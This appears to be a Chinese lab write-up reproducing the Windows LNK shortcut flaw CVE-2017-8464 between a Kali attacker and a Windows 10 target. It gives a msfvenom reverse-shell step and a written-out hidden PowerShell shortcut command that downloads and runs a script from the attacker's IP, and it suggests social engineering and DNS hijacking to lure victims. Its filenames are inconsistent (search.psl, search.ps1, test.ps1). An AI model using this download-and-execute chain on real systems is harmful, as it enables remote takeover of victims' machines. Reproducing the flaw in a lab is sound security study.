CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).
CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
攻击机 Kali
IP: 192.168.1.113
靶机:win10
IP: 192.168.1.3
1.使用msfvenom生成一个msf反弹后门
2.将/opt 下的search.psl 复制到 /var/www/html 下
3.启动apache服务service apache2 start
4.在靶机上创建一个powershell远程快捷:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.113/search.ps1');test.ps1"
5.在kali下监听
6.利用社会工程学误导靶机点击powershell快捷方式,kali就可以监听到了
成功
思考:当Apache启动之后,靶机可以通过访问192.168.1.113来触发spl,那么可以利用DNS劫持使靶机,引导靶机访问。